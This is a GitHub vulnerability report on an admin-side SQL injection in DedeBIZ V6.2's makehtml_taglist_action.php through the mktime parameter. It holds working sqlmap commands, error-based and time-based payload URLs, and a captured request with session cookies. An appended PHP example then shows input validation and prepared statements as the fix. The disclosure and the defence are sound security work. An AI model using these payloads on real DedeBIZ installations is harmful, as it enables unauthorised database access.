
SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/makehtml_taglist_action.php #2

Open
yhy217 opened this issue Sep 21, 2023 · 0 comments

Comments


yhy217 commented Sep 21, 2023

[Suggested description]
SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/makehtml_taglist_action.php

[Vulnerability Type]
SQL INJECTION

[Vendor of Product]
https://github.com/DedeBIZ/DedeV6

[Affected Product Code Base]
DedeBIZ V6.2

[Affected Component]
File: /src/admin/makehtml_taglist_action.php
Parameter: mktime
python sqlmap.py -r sql.txt --current-db

Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1 AND GTID_SUBSET(CONCAT(0x716b787871,(SELECT (ELT(2192=2192,1))),0x716b7a6a71),2192)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1 AND (SELECT 9884 FROM (SELECT(SLEEP(5)))NySf)

[Attack Type]
Remote

[Vulnerability demonstration]
1. After logging in to the website backend as the administrator, access
http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=if(length(database())%3E0,sleep(3),1)
It is found that there is truly a delay when accessing.

payload: http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=if(length(database())%3E0,sleep(3),1)

2. In order to improve the success rate of injection, the -r option is used here to specify the packet file for injection. Access http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1*
and use Burp Suite to capture the data package. Copy the captured data package into sql.txt in the sqlmap directory.
The captured data package:

GET http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1* HTTP/1.1
Host: localhost:8086
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=3r1etgf62m34mf1kqqt8r3pfi6; DedeUserID=1; DedeUserID__ckMd5=b55b6fbf67e0257e; DedeLoginTime=1695266280; DedeLoginTime__ckMd5=29e695100a28380a; DedeStUUID=7bf8a37cf0ee8; DedeStUUID__ckMd5=da06278b80034043; ENV_GOBACK_URL=%2Fadmin%2Fmedia_main.php%3Fdopost%3Dfilemanager; dede_csrf_token=4783a6797f09a7b01ff937bcfa0a67fe; dede_csrf_token__ckMd5=572271cba8e1bb9b
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1


3. Run the command python sqlmap.py -r sql.txt --risk=3 --level=5 --current-db in sqlmap. After the probe, it is found that there is SQL injection at parameter mktime, and the name of the current database is obtained.

[Cause of vulnerability]
In /src/admin/tags_main.php, the user can control the value of the parameter $mktime and the system does not validate the user's input. So there is a possibility of SQL injection.
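The report traces the issue to the mktime query parameter reaching a SQL statement without validation. The following is an added example, not DedeBIZ code and not taken from the report: it contrasts the unchecked string-concatenation pattern the report describes with a hardened handler that rejects any value that is not a plain non-negative integer and binds it as a typed parameter. The table name tag_list, the column names, and the function names are hypothetical; the SQLite in-memory database is used only so the example runs stand-alone.

```php
<?php
// Added example (hypothetical, not DedeBIZ code): validating an integer
// query parameter such as mktime and binding it instead of concatenating it.
declare(strict_types=1);

// Unsafe pattern, shown only to illustrate the reported cause: the raw
// query-string value becomes part of the SQL text, so anything in it that
// parses as SQL is executed with the query's privileges.
function buildQueryUnsafe(string $rawMktime): string
{
    return "SELECT id FROM tag_list WHERE mktime > " . $rawMktime;
}

// Hardened step 1: accept only a non-negative integer. filter_var returns
// false for values such as "1*", "1 AND ..." or "if(length(...),sleep(3),1)",
// so those never reach the query at all.
function parseMktime(?string $raw): ?int
{
    if ($raw === null || $raw === '') {
        return null;
    }
    $value = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 0],
    ]);
    return $value === false ? null : $value;
}

// Hardened step 2: bind the validated integer as a typed parameter so the
// driver treats it as data, never as SQL.
function fetchIdsSince(PDO $db, int $mktime): array
{
    $stmt = $db->prepare('SELECT id FROM tag_list WHERE mktime > :mktime ORDER BY id');
    $stmt->bindValue(':mktime', $mktime, PDO::PARAM_INT);
    $stmt->execute();
    return array_map('intval', $stmt->fetchAll(PDO::FETCH_COLUMN));
}

// Request-handling shape (hypothetical controller code): fail closed with a
// 400 when the parameter is malformed instead of passing it on.
function handleRequest(PDO $db, array $query): array
{
    $mktime = parseMktime($query['mktime'] ?? null);
    if ($mktime === null) {
        return ['status' => 400, 'ids' => []];
    }
    return ['status' => 200, 'ids' => fetchIdsSince($db, $mktime)];
}

// Self-contained demonstration on constructed data.
$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$db->exec('CREATE TABLE tag_list (id INTEGER PRIMARY KEY, mktime INTEGER NOT NULL)');
$db->exec('INSERT INTO tag_list (id, mktime) VALUES (1, 10), (2, 20), (3, 30)');

$good = handleRequest($db, ['mktime' => '15']);
assert($good['status'] === 200 && $good['ids'] === [2, 3]);

// Each of these is the shape of input seen in the report; all are rejected
// before any SQL is built.
foreach (['1*', '1 AND 1=1', 'if(length(database())>0,sleep(3),1)', '-5', ''] as $bad) {
    $resp = handleRequest($db, ['mktime' => $bad]);
    assert($resp['status'] === 400 && $resp['ids'] === []);
}

// For contrast, the unsafe builder would have emitted the attacker's text verbatim.
assert(buildQueryUnsafe('1 AND 1=1') === 'SELECT id FROM tag_list WHERE mktime > 1 AND 1=1');

echo "validation and binding checks passed\n";
```

Validation and binding are complementary: the prepared statement alone would already stop the injection for this parameter, while the integer check also gives a clear 400 for malformed input and a natural place to log it. Applying the same treatment to the other numeric parameters in the request (maxpagesize, tagid, pageno, startid, endid) follows the same pattern.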
